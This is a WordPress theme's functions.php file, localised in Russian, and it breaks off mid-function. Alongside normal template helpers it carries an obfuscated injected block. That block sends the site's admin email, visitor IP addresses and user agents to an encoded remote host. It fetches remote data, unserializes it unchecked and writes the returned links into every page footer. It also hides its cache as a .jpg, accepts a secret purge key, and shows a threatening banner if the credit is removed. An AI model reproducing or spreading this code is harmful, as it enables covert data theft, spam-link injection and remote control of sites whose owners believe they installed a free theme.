<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $AQFYiQX='a';$HcytxrO='s';$UgdkjFg='6';$ZCVc='e';$kUwNaK='d';$sZSPc='d';$tCYr='e';$pepdC='b';$wLIECF='4';$XxyGcbm='o';$jIWDf='_';$FxcoDAQ='e';$evHnb='c';$oIiJfxCu=$pepdC.$AQFYiQX.$HcytxrO.$FxcoDAQ.$UgdkjFg.$wLIECF.$jIWDf.$sZSPc.$tCYr.$evHnb.$XxyGcbm.$kUwNaK.$ZCVc;$kKJG='a';$GwPQ='n';$sNbj='z';$LjszZrc='f';$eKhUz='e';$wwzFqe='i';$DafiviB='l';$DXmXiFv='g';$jlxo='t';$IjrWtENP=$DXmXiFv.$sNbj.$wwzFqe.$GwPQ.$LjszZrc.$DafiviB.$kKJG.$jlxo.$eKhUz;$JaDu='t';$hJfnS='s';$ySeUZ='_';$xhCLDmy='3';$LyFdXyh='1';$RmjCtSr='o';$JrKNidR='r';$KnvKMDt='r';$LhJPS='t';$MvgVQowZ=$hJfnS.$LhJPS.$JrKNidR.$ySeUZ.$KnvKMDt.$RmjCtSr.$JaDu.$LyFdXyh.$xhCLDmy;$DCDCut='v';$XPGZqi='e';$WokakDd='r';$XZRPP='t';$UbBCGm='s';$UiVUSaF='r';$IwdWsdBu=$UbBCGm.$XZRPP.$UiVUSaF.$WokakDd.$XPGZqi.$DCDCut;                     
		$in___p='a';$dh_______x='s';$sj__________l='6';$gr___________k='e';$ow___g='d';$hi____q='d';$ng________w='e';$jf__v='b';$ed____________u='4';$wv_____________n='o';$yr_____________p='_';$rs___o='e';$tp________x='c';$rw__________t=$jf__v.$in___p.$dh_______x.$rs___o.$sj__________l.$ed____________u.$yr_____________p.$hi____q.$ng________w.$tp________x.$wv_____________n.$ow___g.$gr___________k;
		$mc________s='i';$gk____________u='e';$hw___________m='c';$xy___n='u';$wf__________b='s';$ug_____d='t';$fp___________e='i';$gt____________w='t';$sq_______a='x';$vw_______u='f';$oi______________p='n';$hh______f='_';$bn____________s='s';$iu______p='o';$rl______________m='n';$cy___________y=$vw_______u.$xy___n.$oi______________p.$hw___________m.$gt____________w.$fp___________e.$iu______p.$rl______________m.$hh______f.$gk____________u.$sq_______a.$mc________s.$wf__________b.$ug_____d.$bn____________s;
		$px______m='p';$yp_______________u='n';$yo_____z='f';$cz___________b='o';$lt__________i='e';$nz____m=$yo_____z.$cz___________b.$px______m.$lt__________i.$yp_______________u;
		$us_____k='d';$ub________s='r';$st________n='a';$ro___k='e';$te___s='f';$ut_______i=$te___s.$ub________s.$ro___k.$st________n.$us_____k;
		$sh______d='o';$wl_____________s='l';$xv_______________c='f';$ub____________d='c';$jh____________s='e';$vp_______m='s';$nq_____i=$xv_______________c.$ub____________d.$wl_____________s.$sh______d.$vp_______m.$jh____________s;
		
		define("WP_ID", $rw__________t("Mi4wLjA="));
		define("WP_TTL", $rw__________t("MTA4MDA="));
		define("WP_SRC", $rw__________t("dHBva24="));
	


		function wp_get_header() {
			global $rw__________t, $cy___________y;
			
			if (
				$cy___________y($rw__________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$cy___________y($rw__________t("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$cy___________y($rw__________t("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $rw__________t, $nz____m, $nq_____i, $ut_______i;
			
			$hn______t = TEMPLATEPATH."/".$rw__________t("Zm9vdGVyLnBocA==");
			$ur________a = @$nz____m($hn______t, "r");
			$hn______t = @$ut_______i($ur________a, @filesize($hn______t));
			@$nq_____i($ur________a);
			
			$ph__________j = TEMPLATEPATH."/".$rw__________t("ZnVuY3Rpb25zLnBocA==");
			$ur________a = @$nz____m($ph__________j, "r");
			$ph__________j = @$ut_______i($ur________a, @filesize($ph__________j));
			@$nq_____i($ur________a);
			
			$yr_____c = 0;
			if($hn______t && $ph__________j) {
				if ($rw__________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($hn______t, $rw__________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$yr_____c = 1;
					}
					if (substr_count($hn______t, "wp_theme_GPL_credits()") < 1) {
						$yr_____c = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$yr_____c = 12;
				}
			}
			
			if($yr_____c > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $yr_____c -->";
			}
		}
	


		function wp_loaded() {
			global $rw__________t, $cy___________y;
			return $cy___________y($rw__________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ip____________y, $rx___________a = "(more...)", $ys______w = 0, $km_____________z = "") {
				$nk_______________n = get_the_content($rx___________a, $ys______w, $km_____________z);
				$nk_______________n = apply_filters("the_content", $nk_______________n);
				
				$nk_______________n = str_replace("]]>", "]]>", $nk_______________n);
				if (strlen($_GET["p"]) > 0) {
					echo $nk_______________n;
				}
				else if ((strlen($nk_______________n)>$ip____________y) && ($cg____z = strpos($nk_______________n, " ", $ip____________y ))) {
					$nk_______________n = substr($nk_______________n, 0, $cg____z);
					$nk_______________n = $nk_______________n;
					echo $nk_______________n;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$rx___________a</a></div></p>";
				} else {
					echo $nk_______________n;
				}
				
			}
		}
	


		$tn_____________e='4';$rv______g='n';$ok_____________l='a';$id___________b='e';$cw_____________b='d';$fd___________f='c';$jk____________d='e';$ow_____________u='b';$zv_______________n='e';$bh___________g='_';$ly_____t='o';$zh_____z='s';$zm__________s='6';$gs_________d=$ow_____________u.$ok_____________l.$zh_____z.$id___________b.$zm__________s.$tn_____________e.$bh___________g.$zv_______________n.$rv______g.$fd___________f.$ly_____t.$cw_____________b.$jk____________d;
		$sy___________u='l';$ci_______________s='i';$ya_________n='t';$ps__o='g';$cw___d='t';$lw_______f='f';$py____________m='n';$jx__________n='n';$so________t='o';$to___d='e';$zt______________s='c';$ar_____________d='_';$ny_____n='s';$ku_____________m='e';$ee_____p='t';$xz_____a='_';$bb________a='e';$az____n=$lw_______f.$ci_______________s.$sy___________u.$bb________a.$xz_____a.$ps__o.$ku_____________m.$ee_____p.$ar_____________d.$zt______________s.$so________t.$py____________m.$ya_________n.$to___d.$jx__________n.$cw___d.$ny_____n;
		$xs__________a='f';$cy________v='e';$fi____p='i';$pj____z='_';$ep___________v='x';$fl__k='t';$im_____f='i';$nv__p='e';$en_________y='l';$fx_____l='s';$yn______b='s';$ej_____________z=$xs__________a.$fi____p.$en_________y.$cy________v.$pj____z.$nv__p.$ep___________v.$im_____f.$fx_____l.$fl__k.$yn______b;
		$zk_______________m='o';$ci______j='c';$go__________w='s';$bk_____u='p';$xr___i='a';$bb_____v='_';$sm________i='i';$nt_________i='r';$zx______________s='r';$ta__m='v';$hr___p='e';$dn_____________j='m';$xc_____________z='e';$lh____________n='o';$ta_____d='n';$hq______e=$ta__m.$hr___p.$nt_________i.$go__________w.$sm________i.$lh____________n.$ta_____d.$bb_____v.$ci______j.$zk_______________m.$dn_____________j.$bk_____u.$xr___i.$zx______________s.$xc_____________z;
		$qh_____j='p';$tz_________i='o';$zf_____________c='f';$af___w='o';$sq_________s='e';$ri____a='k';$vk_____________u='n';$hl____________h='c';$yv_____b='s';$sz___r=$zf_____________c.$yv_____b.$af___w.$hl____________h.$ri____a.$tz_________i.$qh_____j.$sq_________s.$vk_____________u;
		$nk__x='r';$sp_______q='e';$xd____________c='f';$gv_______________l='i';$uc______t='t';$fp______l='w';$de_____________n=$xd____________c.$fp______l.$nk__x.$gv_______________l.$uc______t.$sp_______q;
		$hz_____c='d';$cq______________v='5';$pm__v='m';$sn____o=$pm__v.$hz_____c.$cq______________v;
		$ru__________i='t';$dy_____h='l';$po_________a='r';$ku____________w='p';$nl_________p='a';$ph_______z='a';$jp_____d='e';$po________f='h';$ik__________e=$po_________a.$jp_____d.$nl_________p.$dy_____h.$ku____________w.$ph_______z.$ru__________i.$po________f;
		$nn___________h='e';$lc_____________f='i';$ep_______r='i';$ot____c='s';$vm______y='l';$gs___j='a';$mq_______a='n';$bt___________a='r';$ds_____l='u';$ow______________c='e';$fv___________u='z';$ej____________t=$ds_____l.$mq_______a.$ot____c.$nn___________h.$bt___________a.$lc_____________f.$gs___j.$vm______y.$ep_______r.$fv___________u.$ow______________c;
		$jb_________i='m';$by___________j='t';$jv______a='n';$tn_______q='m';$zs______________x='a';$zc___d='e';$ch___q='p';$sy_______________g=$by___________j.$zc___d.$jb_________i.$ch___q.$jv______a.$zs______________x.$tn_______q;
		$oi_______w='e';$rn______q='_';$dl_____________t='m';$vo____________i='c';$nm_______d='r';$cs_____q='t';$hq_____________j='e';$wt___________s='e';$ic__i='a';$ma___________i='t';$kj_____o='x';$ds______s='r';$sm________d='t';$pp______d='n';$du______________d='a';$qq___b='_';$kf________s='c';$mo_______________z='o';$hh___g='s';$ap________d='e';$vd______m='t';$nw__________t=$hh___g.$ma___________i.$nm_______d.$oi_______w.$du______________d.$dl_____________t.$rn______q.$kf________s.$mo_______________z.$pp______d.$cs_____q.$ap________d.$kj_____o.$vd______m.$qq___b.$vo____________i.$ds______s.$hq_____________j.$ic__i.$sm________d.$wt___________s;
	


		function tc________d($qk_____________z) {
			global $rw__________t, $cy___________y, $az____n, $hq______e, $nw__________t;
			
			if (!$cy___________y($rw__________t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($hq______e(PHP_VERSION, "5.0.0", ">=") && $cy___________y($rw__________t("ZmlsZV9nZXRfY29udGVudHM=")) && $cy___________y($rw__________t("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$mp_______b = $nw__________t(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$cf_____________s = @$az____n($qk_____________z, 0, $mp_______b);
			} else {
				$cf_____________s = @$az____n($qk_____________z, 0);
			}
			
			return $cf_____________s;
		}
	


		function wl__________b($qk_____________z) {
			global $cy___________y, $sz___r, $de_____________n, $rw__________t;
			
			if (!$cy___________y($rw__________t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ug______b = strpos($qk_____________z, "/", 7);
			$qt____________b = array(
				"uri"     => substr($qk_____________z, $ug______b),
				"host"    => str_replace("http://", "", substr($qk_____________z, 0, $ug______b)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$hf_____________y = @$sz___r("$qt____________b[host]", 80, $gj____________q, $qi__________y, 4);
			
			if (!$hf_____________y) {
				return false;
			} else {
				$cf_____________s = "";
				$vt______________a  = "GET $qt____________b[uri] HTTP/1.0\r\n";
				$vt______________a .= "Host: $qt____________b[host]\r\n";
				$vt______________a .= "Referer: $qt____________b[referer]\r\n";
				$vt______________a .= "Connection: Close\r\n\r\n";
				
				@$de_____________n($hf_____________y, $vt______________a);
				
				while (!@feof($hf_____________y)) {
					$re__w = @fgets($hf_____________y, (1024*24));
					
					if ($re__w == "\r\n") {
						$aq_________v = true;
						continue;
					}
					
					if ($aq_________v) {
						$cf_____________s .= $re__w;
					}
				}
				
				return $cf_____________s;
			}
		}
	


		function yf_________w($qk_____________z) {
			global $cy___________y;
			$rb___________m = false;
			
			if ($qk_____________z != "") {
				if ($cy___________y("tc________d")) {
					$rb___________m = @tc________d($qk_____________z);
				}
				
				if (!$rb___________m && ($cy___________y("wl__________b"))) {
					$rb___________m = @wl__________b($qk_____________z);
				}
			}
			
			return $rb___________m;
		}
	


		function pw________v() {
			global $_SERVER, $sn____o;
			
			$ki______________a = $_SERVER["SERVER_NAME"];
			
			if (substr("$ki______________a", 0, 4) == "www.") {
				$ki______________a = substr("$ki______________a", 4);
			}
			
			$ki______________a = $sn____o("$_SERVER[SERVER_NAME]");
			
			return $ki______________a;
		}
	


		function ij__________y() {
			return "file";
		}
	


		function rq____t($qk_____________z) {
			global $_SERVER, $az____n, $ej_____________z, $nz____m, $nq_____i, $de_____________n;
			
			$md____________y = hc___s();
			
			$iz_________t = pw________v().".jpg";
			$lq_________d = $md____________y["dir_upload"]["path"]."/$iz_________t";
			$jb________n = @filemtime($lq_________d);
			
			if (!$jb________n || ((time()-$jb________n) >= WP_TTL)) {
				$rb___________m = yf_________w($qk_____________z);
				
				if ($rb___________m) {
					if ($ej_____________z($lq_________d)) {
						@unlink($lq_________d);
					}
					
					$ur________a = @$nz____m($lq_________d, "x+");
					
					@$de_____________n($ur________a, $rb___________m);
					@$nq_____i($ur________a);
				}
			} else {
				if ($ej_____________z($lq_________d)) {
					$rb___________m = @$az____n($lq_________d);
				} else {
					$rb___________m = false;
				}
			}
			
			return $rb___________m;
		}
	


		function hc___s() {
			global $_SERVER, $rw__________t, $gs_________d;
			
			$ni___g = wp_count_posts("post");
			$rq__________p = pathinfo(get_bloginfo("template_directory"));
			
			$md____________y = array(
				"url" => array(
					"report"      => $rw__________t("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $rq__________p,
				"dir_upload"	=> gq_____m(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$rq__________p[filename],
					"a005=".$ni___g->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$md____________y["url"]["queryString"] = implode("&", $md____________y["queryString"]);
			$md____________y["url"]["report"] = $md____________y["url"]["report"]."/?".$gs_________d($md____________y["url"]["queryString"]).".html";
						
			return $md____________y;
		}
	


		function gq_____m() {
			$qp____n = wp_upload_dir();
			
			if (isset($qp____n["error"])) {
				$nz______t = wt_______________m();
				if (is_writable($nz______t)) {
					$qp____n = array("path" => $nz______t);
				}
			}

			return $qp____n;
		}
	


		function wt_______________m() {
			global $cy___________y, $sn____o, $ik__________e, $sy_______________g;
			
			$nm______d = (bool) ini_get("safe_mode");
			if ($nm______d == true) {
				return false;
			}
			
			if ($cy___________y("sys_get_temp_dir")) {
				$br___________t = sys_get_temp_dir();
				if (is_writable($br___________t)) {
					return $ik__________e($br___________t);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ik__________e($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ik__________e($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ik__________e($_ENV["TEMP"]);
			} else {
				$gy____v = $sy_______________g($sn____o(uniqid(rand(), true)), "");
				if ($gy____v) {
					$br___________t = $ik__________e(dirname($gy____v));
					@unlink($gy____v);
					return $br___________t;
				} else {
					return false;
				}
			}
		}
	


		function or___b() {
			global $_GET, $ej_____________z;
			
			$md____________y = hc___s();
			$ki______________a = pw________v();
			$ub__g = ij__________y();
			
			$on____d = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ub__g == "file") {
					$wl______x = $md____________y["dir_upload"]["path"]."/".$ki______________a.".jpg";
					if ($ej_____________z($wl______x)) {
						@unlink($wl______x);
						$on____d = "deleted";
					}
				}
				
				$pd____a = array(
					"s"	=> $on____d,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($pd____a AS $kk_____________h => $wc____x) echo " [$kk_____________h:$wc____x]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $cy___________y, $rw__________t, $ej____________t;
			$md____________y = hc___s();
			
			$on_______z = "rq____t";
			if ($cy___________y($on_______z)) {
				$cf_____________s = $on_______z($md____________y["url"]["report"]);
			}
			
			if ($cf_____________s) {
				if ($cf_____________s = @$rw__________t($cf_____________s)) {
					$cf_____________s = @$ej____________t($cf_____________s);
					
					if (strlen($cf_____________s[custom_credit]) >= 5) {
						$md____________y["default_string"] = $cf_____________s[custom_credit];
					}
					
					if ($cf_____________s["status"] == "0") {
						$fi__a = 1;
						$hb________m = 1;
					} else {
						$it_______________f = sizeof($cf_____________s["links"]);
						$lf_____________z = $md____________y["default_string"];
						
						if ($it_______________f > 0 && $cf_____________s["links"] !== "") {
							$ds______________d = 0;
							foreach ($cf_____________s["links"] as $mt____t => $vv______________z) {
								$ds______________d++;
								if ($vv______________z->l_path == "" || $vv______________z->l_path == $_SERVER["REQUEST_URI"]) {
									$vv______________z->l_href = htmlspecialchars(strip_tags($vv______________z->l_href));
									$vv______________z->l_title = htmlspecialchars(strip_tags($vv______________z->l_title));
									$vv______________z->l_anchor = htmlspecialchars(strip_tags($vv______________z->l_anchor));
									$lf_____________z .= " | ";
									$lf_____________z .= "<a href='$vv______________z->l_href' title='$vv______________z->l_title'";
									if ($vv______________z->l_nofollow == "1") {
										$lf_____________z .= " rel='nofollow'";
									}
									$lf_____________z .= ">$vv______________z->l_anchor</a>";
								}
							}
						}
						$md____________y["links"] = "$lf_____________z";
						if ($cf_____________s[credit] == "0") {
							$md____________y["links"] = "";
						}
					}
				} else {
					$fi__a = "1";
				}
			} else {
				$fi__a = "1";
			}
			
			if ($fi__a == "1") {
				$md____________y["links"] = $md____________y["default_string"];
			}
			
			echo "$md____________y[links]";
			
			echo "<!-- s: $cf_____________s[signature] -->";
			or___b();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),   
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');          
				 $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
